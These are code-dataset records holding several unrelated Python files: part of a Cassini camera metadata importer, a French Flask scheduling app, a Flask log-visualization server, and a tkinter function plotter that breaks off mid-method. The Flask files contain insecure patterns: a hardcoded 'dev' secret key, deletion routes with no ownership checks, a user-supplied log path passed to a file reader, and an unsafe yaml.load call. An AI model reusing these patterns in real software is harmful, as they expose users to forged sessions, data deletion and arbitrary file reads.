_COISS_FILTER_WAVELENGTHS[key]\n\n # If we don't have the exact key combination, try to set polarization equal\n # to CLEAR for lack of anything better to do.\n nfilter1 = filter1 if filter1.find('P') == -1 else 'CL1'\n nfilter2 = filter2 if filter2.find('P') == -1 else 'CL2'\n key2 = (camera, nfilter1, nfilter2)\n if key2 in _COISS_FILTER_WAVELENGTHS:\n self._log_nonrepeating_warning(\n 'Using CLEAR instead of polarized filter for unknown COISS '+\n f'filter combination {key[0]}/{key[1]}/{key[2]}')\n return _COISS_FILTER_WAVELENGTHS[key2]\n\n self._log_nonrepeating_warning('Ignoring unknown COISS filter combination '+\n f'{key[0]}/{key[1]}/{key[2]}')\n return None, None, None\n\n def field_obs_wavelength_wavelength1(self):\n camera = self._index_col('INSTRUMENT_ID')[3]\n filter1, filter2 = self._index_col('FILTER_NAME')\n central_wl, fwhm, effective_wl = self._coiss_wavelength_helper(\n camera, filter1, filter2)\n if central_wl is None or fwhm is None:\n return None\n return (central_wl - fwhm/2) / 1000 # microns\n\n def field_obs_wavelength_wavelength2(self):\n camera = self._index_col('INSTRUMENT_ID')[3]\n filter1, filter2 = self._index_col('FILTER_NAME')\n central_wl, fwhm, effective_wl = self._coiss_wavelength_helper(\n camera, filter1, filter2)\n if central_wl is None or fwhm is None:\n return None\n return (central_wl + fwhm/2) / 1000 # microns\n\n def field_obs_wavelength_wave_res1(self):\n return self._wave_res_from_full_bandwidth()\n\n def field_obs_wavelength_wave_res2(self):\n return self.field_obs_wavelength_wave_res1()\n\n def field_obs_wavelength_wave_no_res1(self):\n return self._wave_no_res_from_full_bandwidth()\n\n def field_obs_wavelength_wave_no_res2(self):\n return self.field_obs_wavelength_wave_no_res1()\n\n def field_obs_wavelength_polarization_type(self):\n the_filter = self._combined_filter()\n if the_filter.find('P') != -1:\n return self._create_mult('LINEAR')\n return self._create_mult('NONE')\n\n\n #######################################\n ### OVERRIDE FROM ObsMissionCassini ###\n #######################################\n\n def field_obs_mission_cassini_spacecraft_clock_count1(self):\n partition = self._index_col('SPACECRAFT_CLOCK_CNT_PARTITION')\n count = self._index_col('SPACECRAFT_CLOCK_START_COUNT')\n sc = str(partition) + '/' + str(count)\n sc = self._fix_cassini_sclk(sc)\n try:\n sc_cvt = opus_support.parse_cassini_sclk(sc)\n except Exception as e:\n self._log_nonrepeating_error(f'Unable to parse Cassini SCLK \"{sc}\": {e}')\n return None\n return sc_cvt\n\n def field_obs_mission_cassini_spacecraft_clock_count2(self):\n partition = self._index_col('SPACECRAFT_CLOCK_CNT_PARTITION')\n count = self._index_col('SPACECRAFT_CLOCK_STOP_COUNT')\n sc = str(partition) + '/' + str(count)\n sc = self._fix_cassini_sclk(sc)\n try:\n sc_cvt = opus_support.parse_cassini_sclk(sc)\n except Exception as e:\n self._log_nonrepeating_error(f'Unable to parse Cassini SCLK \"{sc}\": {e}')\n return None\n\n sc1 = self.field_obs_mission_cassini_spacecraft_clock_count1()\n if sc1 is not None and sc_cvt < sc1:\n self._log_nonrepeating_warning(\n f'spacecraft_clock_count1 ({sc1}) and spacecraft_clock_count2 '+\n f'({sc_cvt}) are in the wrong order - setting to count1')\n sc_cvt = sc1\n else:\n image_number = self._index_col('IMAGE_NUMBER')\n sc2_int = int(sc_cvt)\n if int(image_number) != sc2_int:\n self._log_nonrepeating_warning(\n f'spacecraft_clock_count2 ({sc_cvt}) and COISS IMAGE_NUMBER '+\n f'({image_number}) don\\'t match')\n\n return sc_cvt\n\n def field_obs_mission_cassini_ert1(self):\n return self._time_from_index(column='EARTH_RECEIVED_START_TIME')\n\n def field_obs_mission_cassini_ert2(self):\n return self._time2_from_index(self.field_obs_mission_cassini_ert1(),\n column='EARTH_RECEIVED_STOP_TIME')\n\n def field_obs_mission_cassini_mission_phase_name(self):\n mp = self._index_col('MISSION_PHASE_NAME')\n if mp.upper() == 'NULL':\n return self._create_mult(None)\n return self._create_mult(mp.replace('_', ' '))\n\n def field_obs_mission_cassini_sequence_id(self):\n return self._index_col('SEQUENCE_ID')\n\n\n ##############################################\n ### FIELD METHODS FOR obs_instrument_coiss ###\n ##############################################\n\n def field_obs_instrument_coiss_opus_id(self):\n return self.opus_id\n\n def field_obs_instrument_coiss_volume_id(self):\n return self.volume\n\n def field_obs_instrument_coiss_instrument_id(self):\n return self.instrument_id\n\n def field_obs_instrument_coiss_data_conversion_type(self):\n return self._create_mult(self._index_col('DATA_CONVERSION_TYPE'))\n\n def field_obs_instrument_coiss_compression_type(self):\n return self._create_mult(self._index_col('INST_CMPRS_TYPE'))\n\n def field_obs_instrument_coiss_gain_mode_id(self):\n return self._create_mult(self._index_col('GAIN_MODE_ID'))\n\n def field_obs_instrument_coiss_image_observation_type(self):\n obs_type = self._index_col('IMAGE_OBSERVATION_TYPE')\n\n # Sometimes they have both SCIENCE,OPNAV and OPNAV,SCIENCE so normalize\n # the order\n ret_list = []\n if obs_type.find('SCIENCE') != -1:\n ret_list.append('SCIENCE')\n if obs_type.find('OPNAV') != -1:\n ret_list.append('OPNAV')\n if obs_type.find('CALIBRATION') != -1:\n ret_list.append('CALIBRATION')\n if obs_type.find('ENGINEERING') != -1:\n ret_list.append('ENGINEERING')\n if obs_type.find('SUPPORT') != -1:\n ret_list.append('SUPPORT')\n if obs_type.find('UNK') != -1:\n ret_list.append('UNKNOWN')\n\n ret = '/'.join(ret_list)\n\n # If the result isn't the same length as what we started with, we must've\n # encountered a new type we didn't know about\n if len(ret) != len(obs_type.replace('UNK','UNKNOWN')):\n self._log_nonrepeating_error(\n f'Unknown format for COISS image_observation_type: \"{obs_type}\"')\n return self._create_mult(None)\n\n return self._create_mult(ret)\n\n def field_obs_instrument_coiss_missing_lines(self):\n return self._index_col('MISSING_LINES')\n\n def field_obs_instrument_coiss_shutter_mode_id(self):\n return self._create_mult(self._index_col('SHUTTER_MODE_ID'))\n\n def field_obs_instrument_coiss_shutter_state_id(self):\n return self._create_mult(self._index_col('SHUTTER_STATE_ID'))\n\n def field_obs_instrument_coiss_image_number(self):\n return self._index_col('IMAGE_NUMBER')\n\n def field_obs_instrument_coiss_instrument_mode_id(self):\n return self._create_mult(self._index_col('INSTRUMENT_MODE_ID'))\n\n def field_obs_instrument_coiss_target_desc(self):\n target_desc = self._index_col('TARGET_DESC').upper()\n if target_desc in COISS_TARGET_DESC_MAPPING:\n target_desc = COISS_TARGET_DESC_MAPPING[target_desc]\n return self._create_mult(target_desc)\n\n def _combined_filter(self):\n camera = self._index_col('INSTRUMENT_ID')[3]\n filter1, filter2 = self._index_col('FILTER_NAME')\n\n central_wl1, fwhm1, wl1 = self._coiss_wavelength_helper(camera, filter1, 'CL2')\n central_wl2, fwhm2, wl2 = self._coiss_wavelength_helper(camera, 'CL1', filter2)\n\n new_filter = None\n\n if filter1 == 'CL1' and filter2 == 'CL2':\n new_filter = 'CLEAR'\n elif filter1 == 'CL1':\n new_filter = filter2\n elif filter2 == 'CL2':\n new_filter = filter1\n else:\n # If one of them is a polarizer, put it second\n if filter1.find('P') != -1:\n new_filter = filter2 + '+' + filter1\n elif filter2.find('P') != -1:\n new_filter = filter1 + '+' + filter2\n else:\n if (((wl1 is None or wl2 is None or wl1 == wl2) and\n filter1 > filter2) or\n wl1 > wl2):\n # Place filters in wavelength order\n # If wavelengths are the same, make it name order\n filter1, filter2 = filter2, filter1\n new_filter = filter1 + '+' + filter2\n\n return new_filter\n\n def field_obs_instrument_coiss_combined_filter(self):\n new_filter = self._combined_filter()\n return self._create_mult_keep_case(new_filter)\n\n def field_obs_instrument_coiss_camera(self):\n camera = self._index_col('INSTRUMENT_ID')[3]\n assert camera in ('N', 'W')\n return self._create_mult(camera)\n","sub_path":"opus/import/obs_instrument_coiss.py","file_name":"obs_instrument_coiss.py","file_ext":"py","file_size_in_byte":21181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"347038965","text":"from flask import Flask, render_template, request, session, redirect, url_for, g\nfrom db import recuperer_compte, creer_compte, creer_emploi, creer_lieu, creer_groupe, recuperer_lieux, recuperer_emplois, recuperer_groupes, inserer_horaire, inserer_personne_groupe, recuperer_membre_de_groupe, recuperer_horaire_de_groupe, modifier_adresse, suppr_emploi, suppr_lieu, suppr_groupe, suppr_mb_de_groupe\nimport datetime\nfrom date import current_week, str_to_list, Horaire\nfrom werkzeug.security import check_password_hash\nimport sqlite3 as db\n\napp = Flask(__name__)\napp.secret_key = \"dev\"\n\nemplois = []\nmes_groupes = []\nmes_lieux = []\nhoraire = Horaire()\ncday = datetime.date.today()\nsemaine = current_week(cday)\n\n@app.route('/')\ndef set_session():\n session.clear()\n return redirect(url_for('accueil'))\n\n@app.route('/accueil')\ndef accueil():\n return render_template('accueil.html')\n\n@app.route('/login', methods=[\"GET\", \"POST\"])\ndef login():\n erreur = False\n if request.method == \"POST\":\n login = request.form[\"login\"]\n mdp = request.form[\"mdp\"]\n check = recuperer_compte(login)\n if check is None:\n session.clear()\n erreur = True\n elif check_password_hash(check[1],mdp):\n session.clear()\n session['userid'] = check[0]\n session[\"username\"] = login\n session[\"usernickname\"] = check[2]\n return redirect(url_for('accueil'))\n else: \n session.clear()\n erreur = True\n return render_template('login.html',erreur=erreur)\n\n@app.route('/logout')\ndef logout():\n session.clear()\n return redirect(url_for('accueil'))\n\n@app.route('/register', methods=[\"GET\", \"POST\"])\ndef register():\n if request.method == \"POST\":\n for _, value in request.form.items():\n if value == \"\":\n return redirect(url_for('register', erreur_none=True))\n login = request.form[\"login\"]\n mdp = request.form[\"mdp\"]\n mdpcheck = request.form[\"mdpcheck\"]\n pseudo = request.form[\"pseudo\"]\n if recuperer_compte(login) is not None:\n return redirect(url_for('register', erreur_id=True))\n if mdp != mdpcheck:\n return redirect(url_for('register', erreur_mdp=True))\n creer_compte(login,mdp,pseudo)\n return redirect(url_for('login'))\n if 'erreur_id' in request.args:\n return render_template('register.html',erreur_id=request.args['erreur_id'])\n elif 'erreur_mdp' in request.args:\n return render_template('register.html',erreur_mdp=request.args['erreur_mdp'])\n elif 'erreur_none' in request.args:\n return render_template('register.html',erreur_none=request.args['erreur_none'])\n else:\n return render_template('register.html')\n\n@app.route('/profil')\ndef profil():\n global emplois\n global cday \n global semaine\n emplois = recuperer_emplois(session['userid'])\n cday = datetime.date.today()\n semaine = current_week(cday)\n horaires = recuperer_horaire_de_groupe(session['userid'])\n return render_template('profil.html', infos = (emplois, horaires))\n\n@app.route('/groupes')\ndef groupes():\n global mes_groupes\n mes_groupes = recuperer_groupes(session['userid'])\n return render_template('groupes.html', groupes = mes_groupes)\n\n@app.route('/lieux')\ndef lieux():\n global mes_lieux\n mes_lieux = recuperer_lieux(session['userid'])\n return render_template('lieux.html', lieux = mes_lieux)\n\n@app.route('/supprimer_emploi/')\ndef supprimer_emploi(id_emploi):\n suppr_emploi(id_emploi)\n return redirect(url_for('profil'))\n\n@app.route('/supprimer_lieu/')\ndef supprimer_lieu(id_lieu):\n suppr_lieu(id_lieu)\n return redirect(url_for('lieux'))\n\n@app.route('/supprimer_groupe/')\ndef supprimer_groupe(id_groupe):\n suppr_groupe(id_groupe)\n return redirect(url_for('groupes'))\n\n@app.route('/supprimer_mb_g/')\ndef supprimer_mb_g(ids):\n ids = str_to_list(ids)\n id_m, id_g = ids[0], ids[1]\n suppr_mb_de_groupe(id_m, id_g)\n return redirect(url_for('groupes'))\n\n@app.route('/ajouter_emploi', methods=[\"GET\", \"POST\"])\ndef ajouter_emploi():\n if request.method == \"POST\":\n creer_emploi(request.form['nom'], session['userid'])\n return redirect(url_for('profil'))\n else:\n return render_template('ajouter_emploi.html')\n\n@app.route('/ajouter_lieu', methods=[\"GET\", \"POST\"])\ndef ajouter_lieu():\n if request.method == \"POST\":\n creer_lieu(session['userid'], request.form['nom'], request.form['adresse'])\n return redirect(url_for('lieux'))\n else:\n return render_template('ajouter_lieu.html')\n\n@app.route('/ajouter_groupe', methods=[\"GET\", \"POST\"])\ndef ajouter_groupe():\n if request.method == \"POST\":\n creer_groupe(session['userid'], request.form['nom'])\n return redirect(url_for('groupes'))\n else:\n return render_template('ajouter_groupe.html')\n\n@app.route('/modifier_emploi', methods=[\"GET\", \"POST\"])\ndef modifier_emploi():\n global cday\n global semaine\n if request.method == \"POST\":\n inserer_horaire(horaire, request.form[\"lieu\"], session['emploicourant'][0][2], request.form[\"groupe\"], request.form[\"desc\"])\n horaire.reset()\n return redirect(url_for('modifier_emploi'))\n if 'action' in request.args:\n retour = request.args[\"action\"]\n if retour == 'reset':\n horaire.reset()\n elif retour == 'next':\n cday += datetime.timedelta(days = 7)\n semaine = current_week(cday)\n elif retour == 'previous':\n cday -= datetime.timedelta(days = 7)\n semaine = current_week(cday)\n else:\n retour = str_to_list(request.args[\"action\"])\n borne_selec = datetime.datetime(semaine[retour[1]].jour.year, semaine[retour[1]].jour.month, semaine[retour[1]].jour.day, retour[0])\n horaire.set_borne(borne_selec)\n else:\n horaire.reset()\n session[\"groupes\"] = recuperer_groupes(session['userid'])\n session[\"lieux\"] = recuperer_lieux(session['userid'])\n return render_template('modifier_emploi.html', infos=(horaire, semaine, datetime.date.today()))\n\n@app.route('/modifier_groupe', methods=[\"GET\", \"POST\"])\ndef modifier_groupe():\n if request.method == \"POST\":\n membre = recuperer_compte(request.form[\"login\"])\n if membre is None:\n return redirect(url_for('modifier_groupe', erreur=True))\n inserer_personne_groupe(request.form[\"login\"],session[\"groupecourant\"][0][1])\n return redirect(url_for('modifier_groupe'))\n if 'erreur' in request.args:\n return render_template('modifier_groupe.html', erreur=request.args['erreur'])\n else:\n return render_template('modifier_groupe.html')\n\n@app.route('/modifier_lieu', methods=[\"GET\", \"POST\"])\ndef modifier_lieu():\n if request.method == \"POST\":\n modifier_adresse(session['lieucourant'][0], request.form['nouvad'])\n return redirect(url_for('lieux'))\n else:\n return render_template('modifier_lieu.html')\n\n@app.route('/select/')\ndef select(retour):\n return redirect(url_for('modifier_emploi', action=retour))\n\n@app.route('/setemploi/')\ndef setemploi(id_emploi):\n for emploi in emplois:\n if emploi[0][2] == int(id_emploi):\n session['emploicourant'] = emploi\n return redirect(url_for('modifier_emploi'))\n\n@app.route('/setgroupe/')\ndef setgroupe(id_groupe):\n for groupe in mes_groupes:\n if groupe[0][1] == int(id_groupe):\n session['groupecourant'] = groupe\n return redirect(url_for('modifier_groupe'))\n\n@app.route('/setlieu/')\ndef setlieu(id_lieu):\n for lieu in mes_lieux:\n if lieu[0] == int(id_lieu):\n session['lieucourant'] = lieu\n return redirect(url_for('modifier_lieu'))\n\n@app.route(\"/supprimer/\")\ndef supprimer(id_article):\n return redirect(url_for('accueil'))\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"522196676","text":"from flask import Flask, render_template, request\nimport RenderOsmMap\nfrom ParseLogs import get_logs_in_range\nimport yaml\nimport sys\nimport os\n\napp = Flask(__name__,\n static_url_path=\"\",\n static_folder=\"output\",\n template_folder=\"output\")\n\n\n@app.route('/')\ndef send_visualization_layout():\n return render_template('layout.html')\n\n\n@app.route('/logs')\ndef send_metric():\n logPath = request.args.get('logPath')\n min = request.args.get('min')\n max = request.args.get('max')\n return get_logs_in_range(logPath, min, max)\n\n\nif __name__ == \"__main__\":\n with open(sys.argv[1], 'rt', encoding='utf8') as stream:\n try:\n config = yaml.load(stream)\n directoryPath = config['logs']['directory']\n for metric in config['logs']['metrics']:\n metric[\"logName\"] = os.path.join(directoryPath, metric[\"logName\"])\n RenderOsmMap.render_visualization(config['city'], config['logs']['metrics'], config['legends'])\n except yaml.YAMLError as exc:\n print(\"The Visualization config is not in valid Yaml\")\n\n app.run(\"localhost\")\n","sub_path":"visualizer/Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"12175908","text":"import tkinter as tk\nfrom tkinter import StringVar, ttk\nimport math\nimport random\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg # NavigationToolbar2TkAgg\nfrom matplotlib.figure import Figure\nfrom matplotlib.widgets import Slider\nimport numpy\n\n\nclass Graph:\n def update_line(self, function, ax, functions_id):\n line = ax.lines[functions_id]\n print(\"UPDATING LINE: \", line)\n temp = function.calculate()\n line.set_data(temp[0], temp[1])\n print(line, functions_id)\n line.set_label(functions_id + 1)\n self.canvas.draw()\n self.ax.legend()\n\n def add_line(self, function, ax, functions_id):\n print(\"add_line FunctionBarOBJ and ID\", function, functions_id)\n self.functions_list.append(function)\n temp = function.calculate()\n print(\"Result from calculation: \", temp[1])\n\n ax.plot(temp[0], temp[1], label = str(functions_id + 1))\n self.ax = ax\n self.ax.legend()\n self.canvas.draw()\n temp2 = ax.lines[functions_id]\n function.get_line(temp2)\n\n def update_id(self):\n temp = 0\n for i in self.functions_list:\n i.id = temp\n print(i.id)\n temp += 1\n i.update_line()\n\n def delete_line(self, line, id):\n print(line, id)\n line.remove()\n self.functions_list.pop(id)\n temp = 0\n print(\"FOR LOOP STARTS\")\n for i in self.functions_list:\n i.id = temp\n print(i.id)\n temp += 1\n i.update_line()\n i.drop_down(i.degree.get())\n print(\"FOR LOOP STOPS\")\n self.canvas.draw()\n self.ax.legend()\n\n def __init__(self, f, root):\n self.canvas = FigureCanvasTkAgg(f, root)\n self.canvas.get_tk_widget().pack(side = 'right', fill = 'both', expand = True)\n self.functions_list = []\n\n\nclass FunctionBar:\n def get_line(self, line):\n self.line = line\n\n def update_line(self):\n self.window.update_line(self, self.window.ax, self.id)\n\n def calculate(self):\n # print(\"A, B, C and D: \", self.a, self.b, self.c, self.d)\n x = []\n y = []\n # print(\"inside calculate \", self.degree.get())\n if self.degree.get() == \"First degree\": # 2x - 1 a=2, b=1\n for i in range(-21, 21):\n x.append(i)\n j = self.a * i - self.b\n y.append(j)\n\n if self.degree.get() == \"Second degree\": # 2x^2 - 5x - 5\n for i in numpy.arange(-21, 21, 0.01):\n x.append(i)\n j = self.a * i * i - self.b * i - self.c\n y.append(j)\n if self.degree.get() == \"Third degree\": # 2x^3 - 5x^2 -4x - 5\n for i in numpy.arange(-21, 21, 0.01):\n x.append(i)\n j = self.a * i * i * i - self.b * i * i - self.c * i - self.d\n y.append(j)\n if self.degree.get() == \"Logarithm\": # -5 log2(5x)- 6 a=-5, b=2, c=5, d=6\n for i in numpy.arange(-1, 21, 0.0001):\n if self.b > 1 and self.c * i > 0:\n x.append(i)\n j = self.a * math.log((self.c * i), self.b) - self.d\n y.append(j)\n if self.degree.get() == \"sin(x)\": # -2 sin(3x)- 4 a=-2, b=3, c= 4\n for i in numpy.arange(-21, 21, 0.01):\n x.append(i)\n j = self.a * math.sin(self.b * i) - self.c\n y.append(j)\n if self.degree.get() == \"cos(x)\": # -2 cos(3x)- 4 a=-2, b=3, c= 4\n for i in numpy.arange(-21, 21, 0.01):\n x.append(i)\n j = self.a * math.cos(self.b * i) - self.c\n y.append(j)\n if self.degree.get() == \"tan(x)\": # -2 tan(3x)- 4 a=-2, b=3, c= 4\n tol = 30\n for i in numpy.arange(-21, 21, 0.01):\n if math.cos(self.b * i) != 0:\n x.append(i)\n j = self.a * math.tan(self.b * i) - self.c\n if j < -tol or j > tol:\n j = numpy.nan\n y.append(j)\n if self.degree.get() == \"arcsin(x)\": # -2 sin(3x)- 4 a=-2, b=3, c= 4\n for i in numpy.arange(-21, 21, 0.01):\n x.append(i)\n try:\n j = self.a * math.asin(self.b * i) - self.c\n except ValueError:\n j = numpy.nan\n y.append(j)\n if self.degree.get() == \"arccos(x)\": # -2 sin(3x)- 4 a=-2, b=3, c= 4\n for i in numpy.arange(-21, 21, 0.01):\n x.append(i)\n try:\n j = self.a * math.acos(self.b * i) - self.c\n except ValueError:\n j = numpy.nan\n y.append(j)\n if self.degree.get() == \"arctan(x)\": # -2 sin(3x)- 4 a=-2, b=3, c= 4\n for i in numpy.arange(-21, 21, 0.01):\n x.append(i)\n j = self.a * math.atan(self.b * i) - self.c\n y.append(j)\n if self.degree.get() == \"√(x)\": # -2 √(1x - 3) -6\n for i in numpy.arange(-21, 21, 0.01):\n x.append(i)\n try:\n j = self.a * math.sqrt(self.b * i - self.c) - self.d\n except ValueError:\n j = numpy.nan\n y.append(j)\n if self.degree.get() == \"x\\u207F\": # 3 x^(2x -1) -2\n for i in numpy.arange(-21, 21, 0.01):\n x.append(i)\n try:\n j = self.a * math.pow(i, self.b * i - self.c) - self.d\n except ValueError:\n j = numpy.nan\n y.append(j)\n temp = [x, y]\n return temp\n\n def drop_down(self, degree, firsttime = False):\n frame = self.function\n if degree == \"First degree\":\n self.first_degree(frame)\n elif degree == \"Second degree\":\n self.second_degree(frame)\n elif degree == \"Third degree\":\n self.third_degree(frame)\n elif degree == \"Logarithm\":\n self.log(frame)\n elif degree == \"sin(x)\":\n self.sin(frame)\n elif degree == \"cos(x)\":\n self.cos(frame)\n elif degree == \"tan(x)\":\n self.tan(frame)\n elif degree == \"arcsin(x)\":\n self.arcsin(frame)\n elif degree == \"arccos(x)\":\n self.arccos(frame)\n elif degree == \"arctan(x)\":\n self.arctan(frame)\n elif degree == \"√(x)\":\n self.sqrt(frame)\n elif degree == \"x\\u207F\":\n self.xtox(frame)\n\n if firsttime is False:\n self.update_line()\n\n def first_degree(self, frame):\n for widget in frame.winfo_children():\n widget.destroy()\n\n fx = tk.Label(frame, text = \"f\" + str(self.id + 1) + \"(x) = \", font = \"Times 12\", bg = \"white\")\n fx.grid(column = 0, row = 0)\n\n entry1 = tk.Entry(frame, width = 4, textvariable = self.a_text)\n entry1.grid(column = 1, row = 0)\n\n x1_label = tk.Label(frame, text = \"x - \", font = \"Times 10\", bg = \"white\")\n x1_label.grid(column = 2, row = 0)\n\n entry2 = tk.Entry(frame, width = 4, textvariable = self.b_text)\n entry2.grid(column = 5, row = 0)\n\n def second_degree(self, frame):\n for widget in frame.winfo_children():\n widget.destroy()\n\n fx = tk.Label(frame, text = \"f\" + str(self.id + 1) + \"(x) = \", font = \"Times 12\", bg = \"white\")\n fx.grid(column = 0, row = 0)\n\n entry1 = tk.Entry(frame, width = 4, textvariable = self.a_text)\n entry1.grid(column = 1, row = 0)\n\n x1_label = tk.Label(frame, text = \"x² - \", font = \"Times 10\", bg = \"white\")\n x1_label.grid(column = 2, row = 0)\n\n entry2 = tk.Entry(frame, width = 4, textvariable = self.b_text)\n entry2.grid(column = 3, row = 0)\n\n x2_label = tk.Label(frame, text = \"x - \", font = \"Times 10\", bg = \"white\")\n x2_label.grid(column = 4, row = 0)\n\n entry3 = tk.Entry(frame, width = 4, textvariable = self.c_text)\n entry3.grid(column = 5, row = 0)\n\n def third_degree(self, frame):\n for widget in frame.winfo_children():\n widget.destroy()\n\n fx = tk.Label(frame, text = \"f\" + str(self.id + 1) + \"(x) = \", font = \"Times 12\", bg = \"white\")\n fx.grid(column = 0, row = 0)\n\n entry1 = tk.Entry(frame, width = 4, textvariable = self.a_text)\n entry1.grid(column = 1, row = 0)\n\n x1_label = tk.Label(frame, text = \"x³ - \", font = \"Times 10\", bg = \"white\")\n x1_label.grid(column = 2, row = 0)\n\n entry2 = tk.Entry(frame, width = 4, textvariable = self.b_text)\n entry2.grid(column = 3, row = 0)\n\n x2_label = tk.Label(frame, text = \"x² - \", font = \"Times 10\", bg = \"white\")\n x2_label.grid(column = 4, row = 0)\n\n entry3 = tk.Entry(frame, width = 4, textvariable = self.c_text)\n entry3.grid(column = 5, row = 0)\n\n x3_label = tk.Label(frame, text = \"x - \", font = \"Times 10\", bg = \"white\")\n x3_label.grid(column = 6, row = 0)\n\n entry4 = tk.Entry(frame, width = 4, textvariable = self.d_text)\n entry4.grid(column = 7, row = 0)\n\n def log(self, frame):\n for widget in frame.winfo_children():\n widget.destroy()\n\n fx = tk.Label(frame, text = \"f\" + str(self.id + 1) + \"(x) = \", font = \"Times 12\", bg = \"white\")\n fx.grid(column = 0, row = 0)\n\n entry1 = tk.Entry(frame, width = 4, textvariable = self.a_text)\n entry1.grid(column = 1, row = 0)\n\n x1_label = tk.Label(frame, text = \"log\", font = \"Times 10\", bg = \"white\")\n x1_label.grid(column = 2, row = 0)\n\n entry2 = tk.Entry(frame, width = 4, textvariable = self.b_text)\n entry2.grid(column = 3, row = 0)\n\n x2_label = tk.Label(frame, text = \"(\", font = \"Times 10\", bg = \"white\")\n x2_label.grid(column = 4, row = 0)\n\n entry3 = tk.Entry(frame, width = 4, textvariable = self.c_text)\n entry3.grid(column = 5, row = 0)\n\n x3_label = tk.Label(frame, text = \"x) - \", font = \"Times 10\", bg = \"white\")\n x3_label.grid(column = 6, row = 0)\n\n entry4 = tk.Entry(frame, width = 4, textvariable = self.d_text)\n entry4.grid(column = 7, row = 0)\n\n def sin(self, frame):\n for widget in frame.winfo_children():\n widget.destroy()\n\n fx = tk.Label(frame, text = \"f\" + str(self.id + 1) + \"(x) = \", font = \"Times 12\", bg = \"white\")\n fx.grid(column = 0, row = 0)\n\n entry1 = tk.Entry(frame, width = 4, textvariable = self.a_text)\n entry1.grid(column = 1, row = 0)\n\n x1_label = tk.Label(frame, text = \"sin(\", font = \"Times 10\", bg = \"white\")\n x1_label.grid(column = 2, row = 0)\n\n entry2 = tk.Entry(frame, width = 4, textvariable = self.b_text)\n entry2.grid(column = 3, row = 0)\n\n x2_label = tk.Label(frame, text = \"x) - \", font = \"Times 10\", bg = \"white\")\n x2_label.grid(column = 4, row = 0)\n\n entry3 = tk.Entry(frame, width = 4, textvariable = self.c_text)\n entry3.grid(column = 5, row = 0)\n\n def cos(self, frame):\n for widget in frame.winfo_children():\n widget.destroy()\n\n fx = tk.Label(frame, text = \"f\" + str(self.id + 1) + \"(x) = \", font = \"Times 12\", bg = \"white\")\n fx.grid(column = 0, row = 0)\n\n entry1 = tk.Entry(frame, width = 4, textvariable = self.a_text)\n entry1.grid(column = 1, row = 0)\n\n x1_label = tk.Label(frame, text = \"cos(\", font = \"Times 10\", bg = \"white\")\n x1_label.grid(column = 2, row = 0)\n\n entry2 = tk.Entry(frame, width = 4, textvariable = self.b_text)\n entry2.grid(column = 3, row = 0)\n\n x2_label = tk.Label(frame, text = \"x) - \", font = \"Times 10\", bg = \"white\")\n x2_label.grid(column = 4, row = 0)\n\n entry3 = tk.Entry(frame, width = 4, textvariable = self.c_text)\n entry3.grid(column = 5, row = 0)\n\n def tan(self, frame):\n for widget in frame.winfo_children():\n widget.destroy()\n\n fx = tk.Label(frame, text = \"f\" + str(self.id + 1) + \"(x) = \", font = \"Times 12\", bg = \"white\")\n fx.grid(column = 0, row = 0)\n\n entry1 = tk.Entry(frame, width = 4, textvariable = self.a_text)\n entry1.grid(column = 1, row = 0)\n\n x1_label = tk.Label(frame, text = \"tan(\", font = \"Times 10\", bg = \"white\")\n x1_label.grid(column = 2, row = 0)\n\n entry2 = tk.Entry(frame, width = 4, textvariable = self.b_text)\n entry2.grid(column = 3, row = 0)\n\n x2_label = tk.Label(frame, text = \"x) - \", font = \"Times 10\", bg = \"white\")\n x2_label.grid(column = 4, row = 0)\n\n entry3 = tk.Entry(frame, width = 4, textvariable = self.c_text)\n entry3.grid(column = 5, row = 0)\n\n def arcsin(self, frame):\n for widget in frame.winfo_children():\n widget.destroy()\n\n fx = tk.Label(frame, text = \"f\" + str(self.id + 1) + \"(x) = \", font = \"Times 12\", bg = \"white\")\n fx.grid(column = 0, row = 0)\n\n entry1 = tk.Entry(frame, width = 4, textvariable = self.a_text)\n entry1.grid(column = 1, row = 0)\n\n x1_label = tk.Label(frame, text = \"arcsin(\", font = \"Times 10\", bg = \"white\")\n x1_label.grid(column = 2, row = 0)\n\n entry2 = tk.Entry(frame, width = 4, textvariable = self.b_text)\n entry2.grid(column = 3, row = 0)\n\n x2_label = tk.Label(frame, text = \"x) - \", font = \"Times 10\", bg = \"white\")\n x2_label.grid(column = 4, row = 0)\n\n entry3 = tk.Entry(frame, width = 4, textvariable = self.c_text)\n entry3.grid(column = 5, row = 0)\n\n def arccos(self, frame):\n for widget in frame.winfo_children():\n widget.destroy()\n\n fx = tk.Label(frame, text = \"f\" + str(self.id + 1) + \"(x) = \", font = \"Times 12\", bg = \"white\")\n fx.grid(column = 0, row = 0)\n\n entry1 = tk.Entry(frame, width = 4, textvariable = self.a_text)\n entry1.grid(column = 1, row = 0)\n\n x1_label = tk.Label(frame, text = \"arccos(\", font = \"Times 10\", bg = \"white\")\n x1_label.grid(column = 2, row = 0)\n\n entry2 = tk.Entry(frame, width = 4, textvariable = self.b_text)\n entry2.grid(column = 3, row = 0)\n\n x2_label = tk.Label(frame, text = \"x) - \", font = \"Times 10\", bg = \"white\")\n x2_label.grid(column = 4, row = 0)\n\n entry3 = tk.Entry(frame, width = 4, textvariable = self.c_text)\n entry3.grid(column = 5, row = 0)\n\n def arctan(self, frame):\n for widget in frame.winfo_children():\n widget.destroy()\n\n fx = tk.Label(frame, text = \"f\" + str(self.id + 1) + \"(x) = \", font = \"Times 12\", bg = \"white\")\n fx.grid(column = 0, row = 0)\n\n entry1 = tk.Entry(frame, width = 4, textvariable = self.a_text)\n entry1.grid(column = 1, row = 0)\n\n x1_label = tk.Label(frame, text = \"arctan(\", font = \"Times 10\", bg = \"white\")\n x1_label.grid(column = 2, row = 0)\n\n entry2 = tk.Entry(frame, width = 4, textvariable = self.b_text)\n entry2.grid(column = 3, row = 0)\n\n x2_label = tk.Label(frame, text = \"x) - \", font = \"Times 10\", bg = \"white\")\n x2_label.grid(column = 4, row = 0)\n\n entry3 = tk.Entry(frame, width = 4, textvariable = self.c_text)\n entry3.grid(column = 5, row = 0)\n\n def sqrt(self, frame):\n for widget in 